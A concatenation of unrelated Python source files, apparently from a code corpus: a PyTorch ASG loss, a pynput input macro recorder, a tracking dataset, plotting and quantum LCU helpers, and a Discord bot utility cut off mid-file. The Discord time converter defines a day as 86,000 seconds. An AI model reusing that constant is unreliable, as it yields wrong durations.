emissions_graphs[b] = g_emissions
transitions_graphs[b] = g_transitions
gtn.parallel_for(process, range(B))
ctx.auxiliary_data = (
losses,
scales,
emissions_graphs,
transitions_graphs,
inputs.shape,
)
loss = torch.tensor([losses[b].item() * scales[b] for b in range(B)])
return torch.mean(loss.cuda() if inputs.is_cuda else loss)
@staticmethod
def backward(ctx, grad_output):
(
losses,
scales,
emissions_graphs,
transitions_graphs,
in_shape,
) = ctx.auxiliary_data
B, T, C = in_shape
input_grad = transitions_grad = None
if ctx.needs_input_grad[0]:
input_grad = torch.empty((B, T, C))
if ctx.needs_input_grad[1]:
transitions_grad = torch.empty((B, C + 1, C))
def process(b):
gtn.backward(losses[b], False)
emissions = emissions_graphs[b]
transitions = transitions_graphs[b]
if input_grad is not None:
grad = emissions.grad().weights_to_numpy()
input_grad[b] = torch.from_numpy(grad).view(1, T, C) * scales[b]
if transitions_grad is not None:
grad = transitions.grad().weights_to_numpy()
transitions_grad[b] = (
torch.from_numpy(grad).view(1, C + 1, C) * scales[b]
)
gtn.parallel_for(process, range(B))
if input_grad is not None:
if grad_output.is_cuda:
input_grad = input_grad.cuda()
input_grad *= grad_output / B
if transitions_grad is not None:
if grad_output.is_cuda:
transitions_grad = transitions_grad.cuda()
transitions_grad = torch.mean(transitions_grad, 0) * grad_output
return (
input_grad,
transitions_grad,
None, # target
None, # reduction
)
ASGLoss = ASGLossFunction.apply
|
from pypixiv.ranking.body import ContentBody
from typing import Any
from pypixiv.abc import BaseRanking
class RankingInfo(BaseRanking):
def __init__(self, response: Any):
super().__init__(response)
@property
def contents(self) -> list[ContentBody]:
return [ContentBody(content) for content in super().contents]
|
import time
from pynput import keyboard
class StopException(Exception):
pass
class Callbacks:
"""
不同的监听方式仍然有相同的回调函数
"""
scripts = []
current_time = int(time.time())
@classmethod
def on_mouse_move(cls, x, y):
print(x, y)
@classmethod
def on_mouse_click(cls, x, y, button, pressed):
cls.scripts.append(' '.join(['MOUSE_MOVE', cls.get_and_update_time(), str(x), str(y)]))
if pressed:
cls.scripts.append(' '.join(['MOUSE_PRESS', '0', button.name]))
else:
cls.scripts.append(' '.join(['MOUSE_RELEASE', cls.get_and_update_time(), button.name]))
@classmethod
def on_mouse_scroll(cls, x, y, dx, dy):
cls.scripts.append(' '.join(['MOUSE_SCROLL', cls.get_and_update_time(), str(x), str(y), str(dx), str(dy)]))
@classmethod
def on_key_press(cls, key):
if key == keyboard.Key.esc:
raise StopException('stop by esc')
if '_name_' in key.__dict__:
char = key._name_
elif 'char' in key.__dict__:
char = key.char
else:
char = None
cls.scripts.append(' '.join(['KEY_PRESS', cls.get_and_update_time(), 'None' if char is None else char]))
@classmethod
def on_key_release(cls, key):
if '_name_' in key.__dict__:
char = key._name_
elif 'char' in key.__dict__:
char = key.char
else:
char = 'None'
cls.scripts.append(' '.join(['KEY_RELEASE', cls.get_and_update_time(), 'None' if char is None else char]))
@classmethod
def get_and_update_time(cls):
difference = int(time.time()) - cls.current_time
cls.current_time = int(time.time())
return str(difference)
@classmethod
def get_scripts(cls):
return cls.scripts |
import logging
from kalliope.core.Lifo.LIFOBuffer import LIFOBuffer
from six import with_metaclass
from kalliope.core.Models import Singleton
logging.basicConfig()
logger = logging.getLogger("kalliope")
class LifoManager(with_metaclass(Singleton, object)):
lifo_buffer = LIFOBuffer()
@classmethod
def get_singleton_lifo(cls):
return cls.lifo_buffer
@classmethod
def get_new_lifo(cls):
"""
This class is used to manage hooks "on_start_speaking" and "on_stop_speaking".
:return:
"""
return LIFOBuffer()
@classmethod
def clean_saved_lifo(cls):
cls.lifo_buffer = LIFOBuffer()
|
"""Print project status report."""
from datetime import datetime
import pandas as pd
from jinja2 import Environment, FileSystemLoader
import lib.db as db
import lib.util as util
def generate_reports():
"""Generate all of the reports."""
cxn = db.connect()
now = datetime.now()
sample_wells = get_wells(cxn)
plates = get_plates(sample_wells)
genera = get_genus_coverage(cxn)
# generate_html_report(now, sample_wells, plates, genera)
generate_excel_report(cxn, sample_wells, plates, genera)
def get_wells(cxn):
"""Get well data from the database."""
sql = """
select rt.sample_id,
sci_name, family,
qc.concentration, qc.total_dna,
rt.volume, rt.rapid_source, rt.rapid_dest, rt.source_plate,
rt.sample_id is not null as seq_returned,
la.loci_assembled,
sw.plate_id, sw.entry_date, sw.local_id, sw.local_no,
sw.rapid_plates, sw.notes, sw.results, sw.row, sw.col,
sw.well, sw.well_no
from reformatting_templates as rt
left join qc_normal_plate_layout as qc using (rapid_source)
left join taxonomy_ids as ti using (sample_id)
left join taxonomy as tx using (sci_name)
left join loci_assembled as la using (rapid_dest)
left join sample_wells as sw using (plate_id, well);
"""
sample_wells = pd.read_sql(sql, cxn)
return sample_wells
def get_plates(sample_wells):
"""Get a list of plates."""
columns = ['local_no', 'plate_id', 'entry_date',
'local_id', 'rapid_plates', 'notes']
plates = sample_wells.loc[:, columns]
plates = plates.drop_duplicates()
plates = plates.set_index('local_no')
return plates
def get_plate_wells(sample_wells):
"""Assign wells to their plate."""
plate_wells = {}
for _, plate in sample_wells.groupby('local_no'):
plate_id = plate['plate_id'].iloc[0]
plate_wells[plate_id] = plate.fillna('').to_dict(orient='records')
return plate_wells
def get_genus_coverage(cxn):
"""Get family and genus coverage."""
sql = """
WITH in_images AS (
SELECT sci_name
FROM taxonomy
WHERE sample_id_1 IN (SELECT sample_id FROM images)
OR sample_id_2 IN (SELECT sample_id FROM images)
OR sample_id_3 IN (SELECT sample_id FROM images)
OR sample_id_4 IN (SELECT sample_id FROM images)
OR sample_id_5 IN (SELECT sample_id FROM images))
SELECT family, genus, sci_name AS total, 1 AS imaged
FROM taxonomy
WHERE sci_name IN (SELECT sci_name FROM in_images)
UNION ALL
SELECT family, genus, sci_name AS total, 0 AS imaged
FROM taxonomy
WHERE sci_name NOT IN (SELECT sci_name FROM in_images);
"""
taxonomy = pd.read_sql(sql, cxn)
genera = taxonomy.groupby(['family', 'genus']).agg({
'total': 'count', 'imaged': 'sum'})
taxonomy['genus'] = ''
families = taxonomy.groupby(['family', 'genus']).agg({
'total': 'count', 'imaged': 'sum'})
taxonomy['family'] = '~Total~'
total = taxonomy.groupby(['family', 'genus']).agg({
'total': 'count', 'imaged': 'sum'})
coverage = pd.concat([families, genera, total])
coverage['family'] = coverage.index.get_level_values('family')
coverage['genus'] = coverage.index.get_level_values('genus')
coverage['percent'] = coverage['imaged'] / coverage['total'] * 100.0
return coverage.sort_index()
def generate_html_report(now, sample_wells, plates, genera):
"""Generate the HTML version of the report."""
template_dir = util.get_reports_dir()
env = Environment(loader=FileSystemLoader(template_dir))
template = env.get_template('sample_plates_report.html')
report = template.render(
now=now,
wells=get_plate_wells(sample_wells),
plates=plates.to_dict(orient='records'),
genera=genera.to_dict(orient='records'))
report_path = util.get_output_dir() / 'sample_plates_report.html'
with report_path.open('w') as out_file:
out_file.write(report)
def generate_excel_report(cxn, sample_wells, plates, genera):
"""Generate the Excel version of the report."""
genera = genera.drop(['family', 'genus'], axis=1)
sample_wells = sample_wells.drop(
['entry_date', 'local_id', 'rapid_plates', 'notes', 'plate_id',
'row', 'col', 'results', 'volume'], axis=1)
sample_wells = sample_wells.reindex(
"""local_no well_no well family sci_name sample_id rapid_source
rapid_dest concentration total_dna loci_assembled
""".split(), axis=1)
nfn_data = pd.read_sql('SELECT * FROM nfn_data;', cxn)
sample_wells = sample_wells.merge(
right=nfn_data, how='left', on='sample_id')
sample_wells = sample_wells.drop(['subject_id'], axis=1)
sample_wells = sample_wells.sort_values(['local_no', 'well'])
renames = {
'local_no': 'Local Plate Number',
'well_no': 'Well Offset',
'well': 'Well',
'family': 'Family',
'sci_name': 'Scientific Name',
'sample_id': 'Sample ID',
'concentration': 'Concentration (ng / uL)',
'total_dna': 'Total DNA (ng)',
'country': 'Country',
'state_province': 'State/Province',
'county': 'County',
'location': 'Location',
'minimum_elevation': 'Minimum Elevation',
'maximum_elevation': 'Maximum Elevation',
'main_dropdown': 'Main Dropdown',
'latitude_deg': 'Latitude ⁰',
'latitude_min': "Latitude '",
'latitude_sec': 'Latitude "',
'longitude_deg': 'Longitude ⁰',
'longitude_min': "Longitude '",
'longitude_sec': 'Longitude "',
'primary_collector_last_first_middle':
'Primary Collector (*Last* *First* *Middle*)',
'other_collectors_as_written': 'Other Collectors (as written)',
'collector_number_numeric_only': 'Collector Number (numeric only)',
'collector_number_verbatim': 'Collector Number (verbatim)',
'month_1': 'Month #1',
'day_1': 'Day #1',
'year_1': 'Year #1',
'month_2': 'Month #2',
'day_2': 'Day #2',
'year_2': 'Year #2',
'subject_image_name': 'Image Name',
'subject_nybg_bar_code': 'Bar Code',
'subject_resolved_name': 'Resolved Name',
'workflow_id': 'Workflow ID',
'habitat_description': 'Habitat Description',
'subject_provider_id': 'Provider ID',
'collected_by_first_collector_last_name_only':
'Primary Collector (Last Name Only)',
'collector_number': 'Collector Number',
'collection_no': 'Collection Number',
'seq_returned': 'Sequence Returned?',
'loci_assembled': 'Loci Assembled',
'rapid_source': 'Rapid Source ID',
'rapid_dest': 'Rapid Destination ID',
}
sample_wells = sample_wells.rename(columns=renames)
xlsx_path = util.get_report_data_dir() / 'sample_plates_report.xlsx'
with pd.ExcelWriter(xlsx_path) as writer:
genera.to_excel(writer, sheet_name='Family Coverage')
plates.to_excel(writer, sheet_name='Sample Plates')
sample_wells.to_excel(
writer, sheet_name='Sample Plate Wells', index=False)
if __name__ == '__main__':
generate_reports()
|
import glob
import math
import os
import os.path as osp
import random
import time
from collections import OrderedDict
import json
import cv2
import json
import numpy as np
import torch
from ..models.model import create_model,load_model
import torch.nn.functional as F
import torchvision
class Dataset(): # for training
def __init__(self, config, img_size=(1088, 608)):
# Namespace(K=500, arch='dla_34', batch_size=12, cat_spec_wh=False, chunk_sizes=[6, 6], conf_thres=0.4,
# data_cfg='../src/lib/cfg/data.json', data_dir='/home/hust/yly/Dataset/', dataset='jde',
# debug_dir='/tmp/pycharm_project_382/src/lib/../../exp/mot/default/debug', dense_wh=False,
# det_thres=0.3, down_ratio=4, exp_dir='/tmp/pycharm_project_382/src/lib/../../exp/mot',
# exp_id='default', fix_res=True, gpus=[2, 3], gpus_str='2, 3', head_conv=256,
# heads={'hm': 1, 'wh': 4, 'id': 128, 'reg': 2}, hide_data_time=False, hm_weight=1, id_loss='ce',
# id_weight=1, img_size=(1088, 608), input_h=608, input_res=1088, input_video='../videos/MOT16-03.mp4',
# input_w=1088, keep_res=False, load_model='/home/hust/yly/Model/mix_mot17_half_dla34.pth', lr=0.0001,
# lr_step=[20], ltrb=True, master_batch_size=6, mean=[0.408, 0.447, 0.47], metric='loss',
# min_box_area=100, mse_loss=False, multi_loss='uncertainty', nID=14455, nms_thres=0.4, norm_wh=False,
# not_cuda_benchmark=False, not_prefetch_test=False, not_reg_offset=False, num_classes=1, num_epochs=30,
# num_iters=-1, num_stacks=1, num_workers=8, off_weight=1, output_format='video', output_h=152,
# output_res=272, output_root='../demos', output_w=272, pad=31, print_iter=0, reg_loss='l1',
# reg_offset=True, reid_dim=128, resume=False, root_dir='/tmp/pycharm_project_382/src/lib/../..',
# save_all=False, save_dir='/tmp/pycharm_project_382/src/lib/../../exp/mot/default', seed=317,
# std=[0.289, 0.274, 0.278], task='mot', test=False, test_hie=False, test_mot15=False, test_mot16=False,
# test_mot17=False, test_mot20=False, track_buffer=30, trainval=False, val_hie=False, val_intervals=5,
# val_mot15=False, val_mot16=False, val_mot17='True', val_mot20=False, vis_thresh=0.5, wh_weight=0.1)
self.device = config['device']
self.model = create_model('dla_34', {'hm': 1, 'wh': 4, 'id': 128, 'reg': 2},256)
self.model = load_model(self.model, config['feat_extract_model_path'])
self.model = self.model.to(self.device)
self.model.eval()
self.width = img_size[0]
self.height = img_size[1]
self.sum = []
offset = 0
self.label_files = json.load(open(config['label_pth'],'r'))
for seq in self.label_files.keys():
offset += len(self.label_files[seq])
self.sum.append((offset,seq))
self.nF = offset
self.down_rate = config['down_rate']
self.max_len = config['max_len']
self.dim = 128
self.file = config['file']
self.json = open(self.file,'r')
self.recoder = {}
self.recoder = json.load(self.json)
self.json.close()
self.min_frames = config['min_frames']
self.max_frames = config['max_frames']
def __del__(self):
self.json = open(self.file, 'w')
json.dump(self.recoder,self.json)
print('finish record')
self.json.close()
def __getitem__(self, files_index):
offset = 0
for ind in range(0,len(self.sum)):
if files_index < self.sum[ind][0]:
seq = self.sum[ind][1]
files_index -= offset
break
offset = self.sum[ind][0]
track = self.label_files[seq][str(files_index)]
frames = []
target_feat = torch.zeros(self.max_len,self.dim).to(self.device)
ptrack_feat = torch.zeros(self.max_len, self.dim).to(self.device)
ntrack_feat = torch.zeros(self.max_len, self.dim).to(self.device)
target_mask = torch.zeros(self.max_len).to(self.device)
ptrack_mask = torch.zeros(self.max_len).to(self.device)
ntrack_mask = torch.zeros(self.max_len).to(self.device)
for i in range(len(track)):
if len(track[i]) != 0:
frames.append(track[i])
tstart = random.sample(range(0,len(frames)-2*self.min_frames+1),1)[0]
tend = random.sample(range(tstart+self.min_frames-1,min(len(frames)-self.min_frames,tstart+self.max_frames)),1)[0]
pstart = random.sample(range(tend+1,len(frames)-self.min_frames+1),1)[0]
pend = random.sample(range(pstart+1,min(len(frames),pstart+self.max_frames)),1)[0]
for ind,i in enumerate(range(tstart,tend+1)):
target_feat[ind] = self.get_target_feat(frames[i][0],frames[i][1],files_index)
target_mask[ind] = 1
for ind,i in enumerate(range(pstart,pend+1)):
ptrack_feat[ind] = self.get_target_feat(frames[i][0], frames[i][1],files_index)
ptrack_mask[ind] = 1
idtmp = files_index
while idtmp == files_index:
idtmp = random.sample(range(len(self.label_files[seq])),1)[0]
ntrack = self.label_files[seq][str(idtmp)]
frames = []
for i in range(len(ntrack)):
if len(ntrack[i]) != 0:
frames.append(ntrack[i])
tmp = random.sample(range(len(frames)-self.min_frames+1),1)
for ind,i in enumerate(range(tmp[0], min(len(frames), tmp[0]+random.randint(self.min_frames,self.max_frames)))):
ntrack_feat[ind] = self.get_target_feat(frames[i][0],frames[i][1],idtmp)
ntrack_mask[ind] = 1
return (target_feat,target_mask),(ptrack_feat,ptrack_mask),(ntrack_feat,ntrack_mask)
def __len__(self):
return self.nF
def get_target_feat(self,img_pth,tlbr,id):
id = img_pth + '-'+str(id)
if id in self.recoder.keys():
return torch.from_numpy(np.array(self.recoder[id])).float().to(self.device)
with torch.no_grad():
img = cv2.imread(img_pth)
w = tlbr[2] - tlbr[0]
h = tlbr[3] - tlbr[1]
# tlbr[0] += (random.random() - 0.5) * 0.1 * w
# tlbr[1] += (random.random() - 0.5) * 0.1 * h
# tlbr[2] += (random.random() - 0.5) * 0.1 * w
# tlbr[3] += (random.random() - 0.5) * 0.1 * h
def letterbox(img, height=608, width=1088,
color=(127.5, 127.5, 127.5)): # resize a rectangular image to a padded rectangular
shape = img.shape[:2] # shape = [height, width]
ratio = min(float(height) / shape[0], float(width) / shape[1])
new_shape = (round(shape[1] * ratio), round(shape[0] * ratio)) # new_shape = [width, height]
dw = (width - new_shape[0]) / 2 # width padding
dh = (height - new_shape[1]) / 2 # height padding
top, bottom = round(dh - 0.1), round(dh + 0.1)
left, right = round(dw - 0.1), round(dw + 0.1)
img = cv2.resize(img, new_shape, interpolation=cv2.INTER_AREA) # resized, no border
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT,
value=color) # padded rectangular
return img, ratio, dw, dh
img, r, padw, padh = letterbox(img)
tlbr = np.array(tlbr).astype(np.float)
tlbr *= r
tlbr[0] += padw
tlbr[1] += padh
tlbr[2] += padw
tlbr[3] += padh
tlbr = tlbr / self.down_rate
img = img[:, :, ::-1].transpose(2, 0, 1)
img = np.ascontiguousarray(img, dtype=np.float32)
img /= 255.0
img = torch.from_numpy(img).to(self.device).unsqueeze(0)
output = self.model(img)[-1]
id_feature = output['id']
id_feature = F.normalize(id_feature, dim=1)
x = (tlbr[0] + tlbr[2]) /2
y = (tlbr[1] + tlbr[3]) /2
feat = torchvision.ops.roi_align(id_feature,torch.tensor([[0,x,y,x,y]]).float().to(self.device),1).squeeze()
self.recoder[id] = np.array(feat.cpu()).tolist()
return feat
# def get_target_feat(self,img_pth,tlbr,id):
# with torch.no_grad():
# img = cv2.imread(img_pth)
# img = img[:, :, ::-1].transpose(2, 0, 1)
# img = np.ascontiguousarray(img, dtype=np.float32)
# img = torch.from_numpy(img).to(self.device).unsqueeze(0)
# feat = torchvision.ops.roi_align(img,torch.tensor([[0,tlbr[0],tlbr[1],tlbr[2],tlbr[3]]]).float().cuda(),(16,8)).mean(1).reshape(128)
# return feat
|
import math
import random
from collections import namedtuple
import anytree
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
import seaborn as sns
from giskard.plot import soft_axis_off
def hierarchy_pos(
G,
root=None,
width=1.0,
vert_gap=0.2,
vert_loc=0,
leaf_vs_root_factor=0.5,
xcenter=0.5,
):
# REF
# https://epidemicsonnetworks.readthedocs.io/en/latest/_modules/EoN/auxiliary.html#hierarchy_pos
"""
If the graph is a tree this will return the positions to plot this in a
hierarchical layout.
Based on Joel's answer at https://stackoverflow.com/a/29597209/2966723,
but with some modifications.
We include this because it may be useful for plotting transmission trees,
and there is currently no networkx equivalent (though it may be coming soon).
There are two basic approaches we think of to allocate the horizontal
location of a node.
- Top down: we allocate horizontal space to a node. Then its ``k``
descendants split up that horizontal space equally. This tends to result
in overlapping nodes when some have many descendants.
- Bottom up: we allocate horizontal space to each leaf node. A node at a
higher level gets the entire space allocated to its descendant leaves.
Based on this, leaf nodes at higher levels get the same space as leaf
nodes very deep in the tree.
We use use both of these approaches simultaneously with ``leaf_vs_root_factor``
determining how much of the horizontal space is based on the bottom up
or top down approaches. ``0`` gives pure bottom up, while 1 gives pure top
down.
:Arguments:
**G** the graph (must be a tree)
**root** the root node of the tree
- if the tree is directed and this is not given, the root will be found and used
- if the tree is directed and this is given, then the positions will be
just for the descendants of this node.
- if the tree is undirected and not given, then a random choice will be used.
**width** horizontal space for this branch - avoids overlap with other branches
**vert_gap** gap between levels of hierarchy
**vert_loc** vertical location of root
**leaf_vs_root_factor**
xcenter: horizontal location of root
"""
if not nx.is_tree(G):
raise TypeError("cannot use hierarchy_pos on a graph that is not a tree")
if root is None:
if isinstance(G, nx.DiGraph):
root = next(
iter(nx.topological_sort(G))
) # allows back compatibility with nx version 1.11
else:
root = random.choice(list(G.nodes))
def _hierarchy_pos(
G,
root,
leftmost,
width,
leafdx=0.2,
vert_gap=0.2,
vert_loc=0,
xcenter=0.5,
rootpos=None,
leafpos=None,
parent=None,
):
"""
see hierarchy_pos docstring for most arguments
pos: a dict saying where all nodes go if they have been assigned
parent: parent of this branch. - only affects it if non-directed
"""
if rootpos is None:
rootpos = {root: (xcenter, vert_loc)}
else:
rootpos[root] = (xcenter, vert_loc)
if leafpos is None:
leafpos = {}
children = list(G.neighbors(root))
leaf_count = 0
if not isinstance(G, nx.DiGraph) and parent is not None:
children.remove(parent)
if len(children) != 0:
rootdx = width / len(children)
nextx = xcenter - width / 2 - rootdx / 2
for child in children:
nextx += rootdx
rootpos, leafpos, newleaves = _hierarchy_pos(
G,
child,
leftmost + leaf_count * leafdx,
width=rootdx,
leafdx=leafdx,
vert_gap=vert_gap,
vert_loc=vert_loc - vert_gap,
xcenter=nextx,
rootpos=rootpos,
leafpos=leafpos,
parent=root,
)
leaf_count += newleaves
leftmostchild = min((x for x, y in [leafpos[child] for child in children]))
rightmostchild = max((x for x, y in [leafpos[child] for child in children]))
leafpos[root] = ((leftmostchild + rightmostchild) / 2, vert_loc)
else:
leaf_count = 1
leafpos[root] = (leftmost, vert_loc)
return rootpos, leafpos, leaf_count
xcenter = width / 2.0
if isinstance(G, nx.DiGraph):
leafcount = len(
[node for node in nx.descendants(G, root) if G.out_degree(node) == 0]
)
elif isinstance(G, nx.Graph):
leafcount = len(
[
node
for node in nx.node_connected_component(G, root)
if G.degree(node) == 1 and node != root
]
)
rootpos, leafpos, leaf_count = _hierarchy_pos(
G,
root,
0,
width,
leafdx=width * 1.0 / leafcount,
vert_gap=vert_gap,
vert_loc=vert_loc,
xcenter=xcenter,
)
pos = {}
for node in rootpos:
pos[node] = (
leaf_vs_root_factor * leafpos[node][0]
+ (1 - leaf_vs_root_factor) * rootpos[node][0],
leafpos[node][1],
)
xmax = max(x for x, y in pos.values())
for node in pos:
pos[node] = (pos[node][0] * width / xmax, pos[node][1])
return pos
def construct_tree_graph(root, max_depth=np.inf):
tree_g = nx.DiGraph()
for node in anytree.PreOrderIter(root):
tree_g.add_node(node.id, n_reports=len(node.descendants) + 1, depth=node.depth)
for child in node.children:
tree_g.add_edge(node.id, child.id)
return tree_g
TreeplotResult = namedtuple("TreeplotResult", ["ax", "nodelist", "pos"])
def treeplot(
tree_g,
size_threshold=50,
layout="radial",
node_size_scale=5,
node_hue=None,
edge_hue=None,
figsize=(10, 10),
ax=None,
edge_linewidth=1,
node_palette=None,
edge_palette=None,
):
if ax is None:
_, ax = plt.subplots(1, 1, figsize=figsize)
big_nodes = [
x for x, y in tree_g.nodes(data=True) if y["n_reports"] >= size_threshold
]
big_tree_g = tree_g.subgraph(big_nodes)
nodelist = sorted(big_tree_g.nodes)
edgelist = sorted(big_tree_g.edges)
if layout == "radial":
pos = hierarchy_pos(big_tree_g, width=2 * math.pi, xcenter=0)
pos = {
u: (r * math.cos(theta), r * math.sin(theta))
for u, (theta, r) in pos.items()
}
elif layout == "vertical":
pos = hierarchy_pos(big_tree_g)
node_size = [
node_size_scale * (big_tree_g.nodes[node]["n_reports"] - 1) for node in nodelist
]
if node_hue is not None:
if node_hue == "id":
node_hues = nodelist
else:
node_hues = [tree_g.nodes[n][node_hue] for n in nodelist]
if node_palette is None and node_hue is not None:
node_palette = dict(zip(np.unique(node_hues), sns.color_palette("tab10")))
if edge_hue is not None:
edge_hues = [tree_g.edges[u, v][edge_hue] for u, v in edgelist]
edge_color = list(map(edge_palette.__getitem__, edge_hues))
else:
edge_color = "black"
node_color = list(map(node_palette.__getitem__, node_hues))
nx.draw_networkx(
big_tree_g,
pos=pos,
with_labels=False,
nodelist=nodelist,
edgelist=edgelist,
node_size=node_size,
ax=ax,
arrows=False,
width=edge_linewidth,
node_color=node_color,
edge_color=edge_color,
)
soft_axis_off(ax)
ax.axis("square")
return TreeplotResult(ax, nodelist, pos)
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility methods for LCU circuits."""
import math
import numpy
def lambda_norm(diagonal_operator):
"""Computes the lambda norm relevant to LCU algorithms.
Args:
diagonal_operator: instance of DiagonalCoulombHamiltonian.
Returns:
lambda_norm: A float giving the lambda norm.
"""
lambda_norm = 0.
n_qubits = diagonal_operator.one_body.shape[0]
z_vector = numpy.zeros(n_qubits, float)
for p in range(n_qubits):
for q in range(n_qubits):
if p == q:
z_vector[p] -= diagonal_operator.one_body[p, p] / 2.
z_vector[p] -= diagonal_operator.two_body[p, p] / 2.
else:
lambda_norm += abs(diagonal_operator.one_body[p, q]) / 2.
lambda_norm += abs(diagonal_operator.two_body[p, q]) / 4.
z_vector[p] -= diagonal_operator.two_body[p, q] / 4.
z_vector[q] -= diagonal_operator.two_body[p, q] / 4.
lambda_norm += numpy.sum(numpy.absolute(z_vector))
return lambda_norm
def _partial_sums(vals):
"""Adds up the items in the input, yielding partial sums along the way."""
total = 0
for v in vals:
yield total
total += v
yield total
def _differences(weights):
"""Iterates over the input yielding differences between adjacent items."""
previous_weight = None
have_previous_weight = False
for w in weights:
if have_previous_weight:
yield w - previous_weight
previous_weight = w
have_previous_weight = True
def _discretize_probability_distribution(unnormalized_probabilities, epsilon):
"""Approximates probabilities with integers over a common denominator.
Args:
unnormalized_probabilities: A list of non-negative floats proportional
to probabilities from a probability distribution. The numbers may
not be normalized (they do not have to add up to 1).
epsilon: The absolute error tolerance.
Returns:
numerators (list[int]): A list of numerators for each probability.
denominator (int): The common denominator to divide numerators by to
get probabilities.
sub_bit_precision (int): The exponent mu such that
denominator = n * 2**mu
where n = len(unnormalized_probabilities).
It is guaranteed that numerators[i] / denominator is within epsilon of
the i'th input probability (after normalization).
"""
n = len(unnormalized_probabilities)
sub_bit_precision = max(0, int(math.ceil(-math.log(epsilon * n, 2))))
bin_count = 2**sub_bit_precision * n
cumulative = list(_partial_sums(unnormalized_probabilities))
total = cumulative[-1]
discretized_cumulative = [int(math.floor(c / total * bin_count + 0.5))
for c in cumulative]
discretized = list(_differences(discretized_cumulative))
return discretized, bin_count, sub_bit_precision
def _preprocess_for_efficient_roulette_selection(discretized_probabilities):
"""Prepares data for performing efficient roulette selection.
The output is a tuple (alternates, keep_weights). The output is guaranteed
to satisfy a sampling-equivalence property. Specifically, the following
sampling process is guaranteed to be equivalent to simply picking index i
with probability weights[i] / sum(weights):
1. Pick a number i in [0, len(weights) - 1] uniformly at random.
2. Return i With probability keep_weights[i]*len(weights)/sum(weights).
3. Otherwise return alternates[i].
In other words, the output makes it possible to perform roulette selection
while generating only two random numbers, doing a single lookup of the
relevant (keep_chance, alternate) pair, and doing one comparison. This is
not so useful classically, but in the context of a quantum computation
where all those things are expensive the second sampling process is far
superior.
Args:
discretized_probabilities: A list of probabilities approximated by
integer numerators (with an implied common denominator). In order
to operate without floating point error, it is required that the
sum of this list is a multiple of the number of items in the list.
Returns:
alternates (list[int]): An alternate index for each index from 0 to
len(weights) - 1
keep_weight (list[int]): Indicates how often one should stay at index i
instead of switching to alternates[i]. To get the actual keep
probability of the i'th element, multiply keep_weight[i] by
len(discretized_probabilities) then divide by
sum(discretized_probabilities).
"""
weights = list(discretized_probabilities) # Need a copy we can mutate.
if not weights:
raise ValueError('Empty input.')
n = len(weights)
target_weight = sum(weights) // n
if sum(weights) != n * target_weight:
raise ValueError('sum(weights) must be a multiple of len(weights).')
# Initially, every item's alternative is itself.
alternates = list(range(n))
keep_weights = [0] * n
# Scan for needy items and donors. First pass will handle all
# initially-needy items. Second pass will handle any remaining items that
# started as donors but become needy due to over-donation (though some may
# also be handled during the first pass).
donor_position = 0
for _ in range(2):
for i in range(n):
# Is this a needy item?
if weights[i] >= target_weight:
continue # Nope.
# Find a donor.
while weights[donor_position] <= target_weight:
donor_position += 1
# Donate.
donated = target_weight - weights[i]
weights[donor_position] -= donated
alternates[i] = donor_position
keep_weights[i] = weights[i]
# Needy item has been paired. Remove it from consideration.
weights[i] = target_weight
return alternates, keep_weights
def preprocess_lcu_coefficients_for_reversible_sampling(
lcu_coefficients, epsilon):
"""Prepares data used to perform efficient reversible roulette selection.
Treats the coefficients of unitaries in the linear combination of
unitaries decomposition of the Hamiltonian as probabilities in order to
decompose them into a list of alternate and keep numerators allowing for
an efficient preparation method of a state where the computational basis
state :math. `|k>` has an amplitude proportional to the coefficient.
It is guaranteed that following the following sampling process will
sample each index k with a probability within epsilon of
lcu_coefficients[k] / sum(lcu_coefficients) and also,
1. Uniformly sample an index i from [0, len(lcu_coefficients) - 1].
2. With probability keep_numers[i] / by keep_denom, return i.
3. Otherwise return alternates[i].
Args:
lcu_coefficients: A list of non-negative floats, with the i'th float
corresponding to the i'th coefficient of an LCU decomposition
of the Hamiltonian (in an ordering determined by the caller).
epsilon: Absolute error tolerance.
Returns:
alternates (list[int]): A python list of ints indicating alternative
indices that may be switched to after generating a uniform index.
The int at offset k is the alternate to use when the initial index
is k.
keep_numers (list[int]): A python list of ints indicating the
numerators of the probability that the alternative index should be
used instead of the initial index.
sub_bit_precision (int): A python int indicating the exponent of the
denominator to divide the items in keep_numers by in order to get
a probability. The actual denominator is 2**sub_bit_precision.
"""
numers, denom, sub_bit_precision = _discretize_probability_distribution(
lcu_coefficients, epsilon)
assert denom == 2**sub_bit_precision * len(numers)
alternates, keep_numers = _preprocess_for_efficient_roulette_selection(
numers)
return alternates, keep_numers, sub_bit_precision
|
from .default import *
from .abc import ABCRule
|
"""
Contains constants with informative error messages
"""
MALFORMED_JSON = 'Malformed JSON sent with request. Make sure you include something' \
' like the following in the request body: {"name": "playernametovalidate"}'
INVALID_NAME = 'This name is invalid. Please pick a name that is exclusively made up of' \
' alphanumeric characters (no spaces or special characters).' |
import datetime
from typing import Optional, Literal
import discord
import re
from discord.ext import commands, menus
__all__ = [
"CannotPunish",
"embed_create",
"TimeConverter",
"IntentionalUser",
"IntentionalMember",
"CustomMenu",
"user_friendly_dt"
]
class CannotPunish(commands.CommandError):
def __init__(self, punishment: str, users: [discord.Member, discord.User], mod: discord.Member):
self.punish = punishment
self.users = users
self.ctx = mod
def embed_create(user, **kwargs):
color = kwargs.get('color', 0x46ff2e)
title = kwargs.get('title', discord.embeds.EmptyEmbed)
url = kwargs.get('url', discord.embeds.EmptyEmbed)
description = kwargs.get('description', discord.embeds.EmptyEmbed)
embed = discord.Embed(description=description, title=title, color=color, url=url)
embed.set_footer(
text=f'Command sent by {user}',
icon_url=user.avatar_url,
)
return embed
class Time(object):
def __init__(self, unit_name, unit_time, amount_units, total_seconds):
self.unit_name = unit_name
self.unit_time = unit_time
self.amount_units = amount_units
self.total_seconds = total_seconds
class TimeConverter(commands.Converter):
@staticmethod
def unit_getter(unit):
if unit in ["s", "sec", "secs", "second", "seconds"]:
return 1, "second"
if unit in ["m", "min", "mins", "minute", "minutes"]:
return 60, "minute"
if unit in ["h", "hr", "hrs", "hour", "hours"]:
return 3600, "hour"
if unit in ["d", "day", "days"]:
return 86_000, "day"
